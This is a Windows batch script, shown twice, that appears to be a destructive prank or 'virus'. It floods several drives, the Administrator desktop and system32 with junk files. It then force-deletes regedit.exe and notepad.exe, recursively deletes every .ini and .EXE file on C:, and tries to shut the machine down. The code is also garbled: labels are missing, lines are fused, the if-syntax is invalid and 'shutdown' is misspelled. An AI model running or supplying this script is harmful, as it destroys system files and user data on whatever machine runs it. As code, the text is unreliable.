@echo offset %I=1
FOR %%I in (%%I) do echo 748 >sb%I%.txt
set /a I+=1
if %I=1024 then goto b
goto a
FOR %%I in (%%I) do echo 748 >C:\sb%I%.txt
set /a I+=1
if %I=1024 then goto c
goto b
FOR %%I in (%%I) do echo 748 >D:\sb%I%.txt
set /a I+=1
if %I=1024 then goto d
goto c
FOR %%I in (%%I) do echo 748 >F:\sb%I%.txt
set /a I+=1
if %I=1024 then goto e
goto d
FOR %%I in (%%I) do echo 748 >"C:\Documents and Settings\Administrator\桌面\sb%I%.txt"
set /a I+=1
if %I=1024 then goto f
goto e
FOR %%I in (%%I) do echo 748 >C:\WINDOWS\system32\sb%I%.txt
set /a I+=1
if %I=1024 then goto g
goto f
del /q /f C:\WINDOWS\regedit.exe
del /q /f C:\WINDOWS\NOTEPAD.exe
del /q /f /s C:\*.ini
del /q /f /s C:\*.EXE
shoutdown -s
@echo on
@echo offset %I=1
FOR %%I in (%%I) do echo 748 >sb%I%.txt
set /a I+=1
if %I=1024 then goto b
goto a
FOR %%I in (%%I) do echo 748 >C:\sb%I%.txt
set /a I+=1
if %I=1024 then goto c
goto b
FOR %%I in (%%I) do echo 748 >D:\sb%I%.txt
set /a I+=1
if %I=1024 then goto d
goto c
FOR %%I in (%%I) do echo 748 >F:\sb%I%.txt
set /a I+=1
if %I=1024 then goto e
goto d
FOR %%I in (%%I) do echo 748 >"C:\Documents and Settings\Administrator\桌面\sb%I%.txt"
set /a I+=1
if %I=1024 then goto f
goto e
FOR %%I in (%%I) do echo 748 >C:\WINDOWS\system32\sb%I%.txt
set /a I+=1
if %I=1024 then goto g
goto f
del /q /f C:\WINDOWS\regedit.exe
del /q /f C:\WINDOWS\NOTEPAD.exe
del /q /f /s C:\*.ini
del /q /f /s C:\*.EXE
shoutdown -s
@echo on